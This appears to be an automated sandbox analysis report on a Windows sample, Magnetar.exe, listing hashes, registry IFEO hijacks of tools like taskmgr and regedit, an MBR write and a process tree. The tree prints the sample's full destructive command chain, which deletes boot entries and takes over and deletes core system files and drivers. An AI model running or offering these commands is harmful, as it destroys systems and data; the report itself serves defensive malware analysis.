b2c17400a4dc55f4358e3d5ffd6a4ce2f94dad94d6e79d7c0b78319a85ad63b8

Analysis

max time kernel
5s
max time network
24s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
06/07/2024, 11:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Magnetar.exe
Size

1.1MB
MD5

d0e76380e7c1d6efd8768397a5291a35
SHA1

e3861d1d7cb04a41f937a2917ec9fb385d4bdfdf
SHA256

b2c17400a4dc55f4358e3d5ffd6a4ce2f94dad94d6e79d7c0b78319a85ad63b8
SHA512

5c4ef4ace91dd6cac1e897af639d97b4c44b21c8fa81e4ea107a4880395dab2f5a425e08b89917eb9664a4f5cd7374d905008446d61f27a614e259ccd4cc1220
SSDEEP

6144:7bnax+xda+AxQxQq4kT+U2PwEfs52ZPQsrwXrUBEfyT3vm9EwJ019JZ2gouG+tr:b7UgMfu9ezFbdCO90GhQDxskM0

Score

8^/10

bootkit discovery exploit persistence

Malware Config

Signatures

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 14 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe	Magnetar.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\Debugger = "winlogon.exe"	Magnetar.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp64.exe\Debugger = "winlogon.exe"	Magnetar.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe	Magnetar.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "winlogon.exe"	Magnetar.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger = "winlogon.exe"	Magnetar.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe	Magnetar.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp64.exe	Magnetar.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe	Magnetar.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp64a.exe	Magnetar.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe\Debugger = "winlogon.exe"	Magnetar.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe	Magnetar.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp64a.exe\Debugger = "winlogon.exe"	Magnetar.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\Debugger = "winlogon.exe"	Magnetar.exe

Possible privilege escalation attempt 60 IoCs

exploit

pid	Process
1364	icacls.exe
1176	icacls.exe
2432	icacls.exe
1588	icacls.exe
2592	takeown.exe
2580	takeown.exe
2332	takeown.exe
3064	icacls.exe
1504	takeown.exe
2968	icacls.exe
1232	icacls.exe
2612	takeown.exe
528	takeown.exe
1276	icacls.exe
2056	takeown.exe
2296	icacls.exe
1844	icacls.exe
1728	icacls.exe
2536	takeown.exe
2788	takeown.exe
1292	takeown.exe
1744	icacls.exe
2484	icacls.exe
2640	icacls.exe
2256	icacls.exe
2060	icacls.exe
604	icacls.exe
2832	takeown.exe
2916	icacls.exe
924	takeown.exe
2780	takeown.exe
2540	takeown.exe
2716	icacls.exe
2144	takeown.exe
2648	takeown.exe
2528	takeown.exe
1008	icacls.exe
1280	takeown.exe
3008	takeown.exe
2736	takeown.exe
1496	icacls.exe
1808	icacls.exe
1680	icacls.exe
2688	takeown.exe
2880	icacls.exe
2608	icacls.exe
2728	takeown.exe
1536	takeown.exe
2004	takeown.exe
2476	icacls.exe
2604	takeown.exe
568	takeown.exe
2236	icacls.exe
2544	takeown.exe
1152	icacls.exe
2376	icacls.exe
1556	icacls.exe
2152	takeown.exe
1784	takeown.exe
1660	takeown.exe

Modifies file permissions 1 TTPs 60 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2144	takeown.exe
2580	takeown.exe
2916	icacls.exe
2152	takeown.exe
2296	icacls.exe
1744	icacls.exe
604	icacls.exe
2640	icacls.exe
2604	takeown.exe
2736	takeown.exe
2236	icacls.exe
2716	icacls.exe
2728	takeown.exe
1784	takeown.exe
1728	icacls.exe
1152	icacls.exe
1556	icacls.exe
2060	icacls.exe
1008	icacls.exe
2476	icacls.exe
1364	icacls.exe
2880	icacls.exe
2608	icacls.exe
2540	takeown.exe
1280	takeown.exe
1660	takeown.exe
1680	icacls.exe
3064	icacls.exe
2788	takeown.exe
568	takeown.exe
1292	takeown.exe
2536	takeown.exe
2592	takeown.exe
528	takeown.exe
1808	icacls.exe
1232	icacls.exe
2648	takeown.exe
2832	takeown.exe
1176	icacls.exe
2332	takeown.exe
2256	icacls.exe
2968	icacls.exe
1504	takeown.exe
2612	takeown.exe
924	takeown.exe
2376	icacls.exe
2004	takeown.exe
2056	takeown.exe
2528	takeown.exe
2484	icacls.exe
2688	takeown.exe
1536	takeown.exe
1496	icacls.exe
2780	takeown.exe
2544	takeown.exe
3008	takeown.exe
2432	icacls.exe
1276	icacls.exe
1844	icacls.exe
1588	icacls.exe

Modifies boot configuration data using bcdedit 4 IoCs

pid	Process
2608	bcdedit.exe
2132	bcdedit.exe
2664	bcdedit.exe
2712	bcdedit.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	Magnetar.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
2424	Magnetar.exe
2424	Magnetar.exe
2424	Magnetar.exe
2424	Magnetar.exe
2424	Magnetar.exe
2424	Magnetar.exe
2424	Magnetar.exe
2424	Magnetar.exe
2424	Magnetar.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	2424	Magnetar.exe
Token: SeTakeOwnershipPrivilege	2648	takeown.exe
Token: SeTakeOwnershipPrivilege	2728	takeown.exe
Token: SeTakeOwnershipPrivilege	2144	takeown.exe
Token: SeTakeOwnershipPrivilege	2604	takeown.exe
Token: SeTakeOwnershipPrivilege	2780	takeown.exe
Token: SeTakeOwnershipPrivilege	2540	takeown.exe
Token: SeTakeOwnershipPrivilege	2544	takeown.exe
Token: SeTakeOwnershipPrivilege	2004	takeown.exe
Token: SeTakeOwnershipPrivilege	2056	takeown.exe
Token: SeTakeOwnershipPrivilege	2788	takeown.exe
Token: SeTakeOwnershipPrivilege	2536	takeown.exe
Token: SeTakeOwnershipPrivilege	2528	takeown.exe
Token: SeTakeOwnershipPrivilege	2688	takeown.exe
Token: SeTakeOwnershipPrivilege	2592	takeown.exe
Token: SeTakeOwnershipPrivilege	2580	takeown.exe
Token: SeTakeOwnershipPrivilege	1536	takeown.exe
Token: SeTakeOwnershipPrivilege	1504	takeown.exe
Token: SeTakeOwnershipPrivilege	2736	takeown.exe
Token: SeTakeOwnershipPrivilege	3008	takeown.exe
Token: SeTakeOwnershipPrivilege	1280	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2424 wrote to memory of 1828	2424	Magnetar.exe	31
PID 2424 wrote to memory of 1828	2424	Magnetar.exe	31
PID 2424 wrote to memory of 1828	2424	Magnetar.exe	31
PID 2424 wrote to memory of 1828	2424	Magnetar.exe	31
PID 2424 wrote to memory of 740	2424	Magnetar.exe	32
PID 2424 wrote to memory of 740	2424	Magnetar.exe	32
PID 2424 wrote to memory of 740	2424	Magnetar.exe	32
PID 2424 wrote to memory of 740	2424	Magnetar.exe	32
PID 2424 wrote to memory of 2696	2424	Magnetar.exe	33
PID 2424 wrote to memory of 2696	2424	Magnetar.exe	33
PID 2424 wrote to memory of 2696	2424	Magnetar.exe	33
PID 2424 wrote to memory of 2696	2424	Magnetar.exe	33
PID 740 wrote to memory of 2608	740	cmd.exe	35
PID 740 wrote to memory of 2608	740	cmd.exe	35
PID 740 wrote to memory of 2608	740	cmd.exe	35
PID 2424 wrote to memory of 3068	2424	Magnetar.exe	34
PID 2424 wrote to memory of 3068	2424	Magnetar.exe	34
PID 2424 wrote to memory of 3068	2424	Magnetar.exe	34
PID 2424 wrote to memory of 3068	2424	Magnetar.exe	34
PID 2696 wrote to memory of 2132	2696	cmd.exe	36
PID 2696 wrote to memory of 2132	2696	cmd.exe	36
PID 2696 wrote to memory of 2132	2696	cmd.exe	36
PID 2424 wrote to memory of 2040	2424	Magnetar.exe	37
PID 2424 wrote to memory of 2040	2424	Magnetar.exe	37
PID 2424 wrote to memory of 2040	2424	Magnetar.exe	37
PID 2424 wrote to memory of 2040	2424	Magnetar.exe	37
PID 2424 wrote to memory of 2620	2424	Magnetar.exe	38
PID 2424 wrote to memory of 2620	2424	Magnetar.exe	38
PID 2424 wrote to memory of 2620	2424	Magnetar.exe	38
PID 2424 wrote to memory of 2620	2424	Magnetar.exe	38
PID 2696 wrote to memory of 2664	2696	cmd.exe	39
PID 2696 wrote to memory of 2664	2696	cmd.exe	39
PID 2696 wrote to memory of 2664	2696	cmd.exe	39
PID 740 wrote to memory of 2712	740	cmd.exe	40
PID 740 wrote to memory of 2712	740	cmd.exe	40
PID 740 wrote to memory of 2712	740	cmd.exe	40
PID 2696 wrote to memory of 2728	2696	cmd.exe	41
PID 2696 wrote to memory of 2728	2696	cmd.exe	41
PID 2696 wrote to memory of 2728	2696	cmd.exe	41
PID 740 wrote to memory of 2648	740	cmd.exe	42
PID 740 wrote to memory of 2648	740	cmd.exe	42
PID 740 wrote to memory of 2648	740	cmd.exe	42
PID 1828 wrote to memory of 2144	1828	cmd.exe	43
PID 1828 wrote to memory of 2144	1828	cmd.exe	43
PID 1828 wrote to memory of 2144	1828	cmd.exe	43
PID 1828 wrote to memory of 2144	1828	cmd.exe	43
PID 2696 wrote to memory of 2780	2696	cmd.exe	44
PID 2696 wrote to memory of 2780	2696	cmd.exe	44
PID 2696 wrote to memory of 2780	2696	cmd.exe	44
PID 740 wrote to memory of 2604	740	cmd.exe	45
PID 740 wrote to memory of 2604	740	cmd.exe	45
PID 740 wrote to memory of 2604	740	cmd.exe	45
PID 740 wrote to memory of 2540	740	cmd.exe	46
PID 740 wrote to memory of 2540	740	cmd.exe	46
PID 740 wrote to memory of 2540	740	cmd.exe	46
PID 2696 wrote to memory of 2544	2696	cmd.exe	47
PID 2696 wrote to memory of 2544	2696	cmd.exe	47
PID 2696 wrote to memory of 2544	2696	cmd.exe	47
PID 1828 wrote to memory of 2004	1828	cmd.exe	48
PID 1828 wrote to memory of 2004	1828	cmd.exe	48
PID 1828 wrote to memory of 2004	1828	cmd.exe	48
PID 1828 wrote to memory of 2004	1828	cmd.exe	48
PID 2696 wrote to memory of 2788	2696	cmd.exe	49
PID 2696 wrote to memory of 2788	2696	cmd.exe	49

C:\Users\Admin\AppData\Local\Temp\Magnetar.exe
"C:\Users\Admin\AppData\Local\Temp\Magnetar.exe"
1⤵
- Event Triggered Execution: Image File Execution Options Injection
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2424
- C:\Windows\SysWOW64\cmd.exe
  /c cd C:\Windows\System32\ & bcdedit /delete {current} & bcdedit /delete {default} & takeown /f C:\ntldr & takeown /f C:\Windows\System32\hal.dll & takeown /f C:\Windows\System32\ntoskrnl.exe & takeown /f C:\Windows\System32\winresume.exe & takeown /f C:\Windows\System32\winload.exe & takeown /f C:\Windows\System32\drivers\acpi.sys & takeown /f C:\Windows\System32\drivers\classpnp.sys & takeown /f C:\Windows\System32\drivers\disk.sys & takeown /f C:\Windows\System32\drivers\ndis.sys & takeown /f C:\Windows\System32\drivers\ntfs.sys & echo y | cacls C:\ntldr /g ""everyone"":F & echo y | cacls C:\Windows\System32\hal.dll /g ""everyone"":F & echo y | cacls C:\Windows\System32\ntoskrnl.exe /g ""everyone"":F & echo y | cacls C:\Windows\System32\winresume.exe /g ""everyone"":F & echo y | cacls C:\Windows\System32\winload.exe /g ""everyone"":F & echo y | cacls C:\Windows\System32\drivers\acpi.sys /g ""everyone"":F & echo y | cacls C:\Windows\System32\drivers\classpnp.sys & echo y | cacls C:\Windows\System32\drivers\disk.sys /g ""everyone"":F & echo y | cacls C:\Windows\System32\drivers\ndis.sys /g ""everyone"":F & echo y | cacls C:\Windows\System32\drivers\ntfs.sys /g ""everyone"":F & icacls C:\ntldr /grant ""everyone"":F & icacls C:\Windows\System32\hal.dll /grant ""everyone"":F & icacls C:\Windows\System32\ntoskrnl.exe /grant ""everyone"":F & icacls C:\Windows\System32\winresume.exe /grant ""everyone"":F & icacls C:\Windows\System32\winload.exe /grant ""everyone"":F & icacls C:\Windows\System32\drivers\acpi.sys /grant ""everyone"":F & icacls C:\Windows\System32\drivers\classpnp.sys /grant ""everyone"":F & icacls C:\Windows\System32\drivers\disk.sys /grant ""everyone"":F & icacls C:\Windows\System32\drivers\ndis.sys /grant ""everyone"":F & icacls C:\Windows\System32\drivers\ntfs.sys /grant ""everyone"":F & del /f /q C:\ntldr & del /f /q C:\Windows\System32\hal.dll & del /f /q C:\Windows\System32\ntoskrnl.exe & del /f /q C:\Windows\System32\winresume.exe & del /f /q C:\Windows\System32\winload.exe & del /f /q C:\Windows\System32\drivers\acpi.sys & del /f /q C:\Windows\System32\drivers\classpnp.sys & del /f /q C:\Windows\System32\drivers\disk.sys & del /f /q C:\Windows\System32\drivers\ndis.sys & del /f /q C:\Windows\System32\drivers\ntfs.sys & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\ntldr
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2144
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\System32\hal.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2004
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\System32\ntoskrnl.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2688
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\System32\winresume.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1536
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\System32\winload.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1504
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\System32\drivers\acpi.sys
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2612
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\System32\drivers\classpnp.sys
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1292
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\System32\drivers\disk.sys
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2832
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\System32\drivers\ndis.sys
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1784
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\System32\drivers\ntfs.sys
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:432
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ntldr /g ""everyone"":F
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\System32\hal.dll /g ""everyone"":F
    3⤵
    PID:2148
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:2856
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\System32\ntoskrnl.exe /g ""everyone"":F
    3⤵
    PID:2900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\System32\winresume.exe /g ""everyone"":F
    3⤵
    PID:1340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\System32\winload.exe /g ""everyone"":F
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\System32\drivers\acpi.sys /g ""everyone"":F
    3⤵
    PID:1312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\System32\drivers\classpnp.sys
    3⤵
    PID:1820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\System32\drivers\disk.sys /g ""everyone"":F
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:2960
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\System32\drivers\ndis.sys /g ""everyone"":F
    3⤵
    PID:388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:2448
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\System32\drivers\ntfs.sys /g ""everyone"":F
    3⤵
    PID:1768
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\ntldr /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1728
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\System32\hal.dll /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1844
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\System32\ntoskrnl.exe /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1556
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\System32\winresume.exe /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1232
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\System32\winload.exe /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1588
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\System32\drivers\acpi.sys /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2484
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\System32\drivers\classpnp.sys /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3064
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\System32\drivers\disk.sys /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2608
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\System32\drivers\ndis.sys /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2716
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\System32\drivers\ntfs.sys /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2640
- C:\Windows\system32\cmd.exe
  /c cd C:\Windows\System32\ & bcdedit /delete {current} & bcdedit /delete {default} & takeown /f C:\ntldr & takeown /f C:\Windows\System32\hal.dll & takeown /f C:\Windows\System32\ntoskrnl.exe & takeown /f C:\Windows\System32\winresume.exe & takeown /f C:\Windows\System32\winload.exe & takeown /f C:\Windows\System32\drivers\acpi.sys & takeown /f C:\Windows\System32\drivers\classpnp.sys & takeown /f C:\Windows\System32\drivers\disk.sys & takeown /f C:\Windows\System32\drivers\ndis.sys & takeown /f C:\Windows\System32\drivers\ntfs.sys & echo y | cacls C:\ntldr /g ""everyone"":F & echo y | cacls C:\Windows\System32\hal.dll /g ""everyone"":F & echo y | cacls C:\Windows\System32\ntoskrnl.exe /g ""everyone"":F & echo y | cacls C:\Windows\System32\winresume.exe /g ""everyone"":F & echo y | cacls C:\Windows\System32\winload.exe /g ""everyone"":F & echo y | cacls C:\Windows\System32\drivers\acpi.sys /g ""everyone"":F & echo y | cacls C:\Windows\System32\drivers\classpnp.sys & echo y | cacls C:\Windows\System32\drivers\disk.sys /g ""everyone"":F & echo y | cacls C:\Windows\System32\drivers\ndis.sys /g ""everyone"":F & echo y | cacls C:\Windows\System32\drivers\ntfs.sys /g ""everyone"":F & icacls C:\ntldr /grant ""everyone"":F & icacls C:\Windows\System32\hal.dll /grant ""everyone"":F & icacls C:\Windows\System32\ntoskrnl.exe /grant ""everyone"":F & icacls C:\Windows\System32\winresume.exe /grant ""everyone"":F & icacls C:\Windows\System32\winload.exe /grant ""everyone"":F & icacls C:\Windows\System32\drivers\acpi.sys /grant ""everyone"":F & icacls C:\Windows\System32\drivers\classpnp.sys /grant ""everyone"":F & icacls C:\Windows\System32\drivers\disk.sys /grant ""everyone"":F & icacls C:\Windows\System32\drivers\ndis.sys /grant ""everyone"":F & icacls C:\Windows\System32\drivers\ntfs.sys /grant ""everyone"":F & del /f /q C:\ntldr & del /f /q C:\Windows\System32\hal.dll & del /f /q C:\Windows\System32\ntoskrnl.exe & del /f /q C:\Windows\System32\winresume.exe & del /f /q C:\Windows\System32\winload.exe & del /f /q C:\Windows\System32\drivers\acpi.sys & del /f /q C:\Windows\System32\drivers\classpnp.sys & del /f /q C:\Windows\System32\drivers\disk.sys & del /f /q C:\Windows\System32\drivers\ndis.sys & del /f /q C:\Windows\System32\drivers\ntfs.sys & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:740
- - C:\Windows\System32\bcdedit.exe
    bcdedit /delete {current}
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2608
- - C:\Windows\System32\bcdedit.exe
    bcdedit /delete {default}
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2712
- - C:\Windows\System32\takeown.exe
    takeown /f C:\ntldr
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2648
- - C:\Windows\System32\takeown.exe
    takeown /f C:\Windows\System32\hal.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2604
- - C:\Windows\System32\takeown.exe
    takeown /f C:\Windows\System32\ntoskrnl.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2540
- - C:\Windows\System32\takeown.exe
    takeown /f C:\Windows\System32\winresume.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2056
- - C:\Windows\System32\takeown.exe
    takeown /f C:\Windows\System32\winload.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2528
- - C:\Windows\System32\takeown.exe
    takeown /f C:\Windows\System32\drivers\acpi.sys
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2592
- - C:\Windows\System32\takeown.exe
    takeown /f C:\Windows\System32\drivers\classpnp.sys
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2736
- - C:\Windows\System32\takeown.exe
    takeown /f C:\Windows\System32\drivers\disk.sys
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1280
- - C:\Windows\System32\takeown.exe
    takeown /f C:\Windows\System32\drivers\ndis.sys
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:568
- - C:\Windows\System32\takeown.exe
    takeown /f C:\Windows\System32\drivers\ntfs.sys
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:2584
- - C:\Windows\System32\cacls.exe
    cacls C:\ntldr /g ""everyone"":F
    3⤵
    PID:2760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:308
- - C:\Windows\System32\cacls.exe
    cacls C:\Windows\System32\hal.dll /g ""everyone"":F
    3⤵
    PID:2328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:344
- - C:\Windows\System32\cacls.exe
    cacls C:\Windows\System32\ntoskrnl.exe /g ""everyone"":F
    3⤵
    PID:1084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:2772
- - C:\Windows\System32\cacls.exe
    cacls C:\Windows\System32\winresume.exe /g ""everyone"":F
    3⤵
    PID:2944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:2372
- - C:\Windows\System32\cacls.exe
    cacls C:\Windows\System32\winload.exe /g ""everyone"":F
    3⤵
    PID:2340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:1228
- - C:\Windows\System32\cacls.exe
    cacls C:\Windows\System32\drivers\acpi.sys /g ""everyone"":F
    3⤵
    PID:1028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:2024
- - C:\Windows\System32\cacls.exe
    cacls C:\Windows\System32\drivers\classpnp.sys
    3⤵
    PID:2344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:996
- - C:\Windows\System32\cacls.exe
    cacls C:\Windows\System32\drivers\disk.sys /g ""everyone"":F
    3⤵
    PID:1596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:1752
- - C:\Windows\System32\cacls.exe
    cacls C:\Windows\System32\drivers\ndis.sys /g ""everyone"":F
    3⤵
    PID:2228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:2348
- - C:\Windows\System32\cacls.exe
    cacls C:\Windows\System32\drivers\ntfs.sys /g ""everyone"":F
    3⤵
    PID:2180
- - C:\Windows\System32\icacls.exe
    icacls C:\ntldr /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2880
- - C:\Windows\System32\icacls.exe
    icacls C:\Windows\System32\hal.dll /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2296
- - C:\Windows\System32\icacls.exe
    icacls C:\Windows\System32\ntoskrnl.exe /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2256
- - C:\Windows\System32\icacls.exe
    icacls C:\Windows\System32\winresume.exe /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2432
- - C:\Windows\System32\icacls.exe
    icacls C:\Windows\System32\winload.exe /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1276
- - C:\Windows\System32\icacls.exe
    icacls C:\Windows\System32\drivers\acpi.sys /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:604
- - C:\Windows\System32\icacls.exe
    icacls C:\Windows\System32\drivers\classpnp.sys /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1744
- - C:\Windows\System32\icacls.exe
    icacls C:\Windows\System32\drivers\disk.sys /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2476
- - C:\Windows\System32\icacls.exe
    icacls C:\Windows\System32\drivers\ndis.sys /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1808
- - C:\Windows\System32\icacls.exe
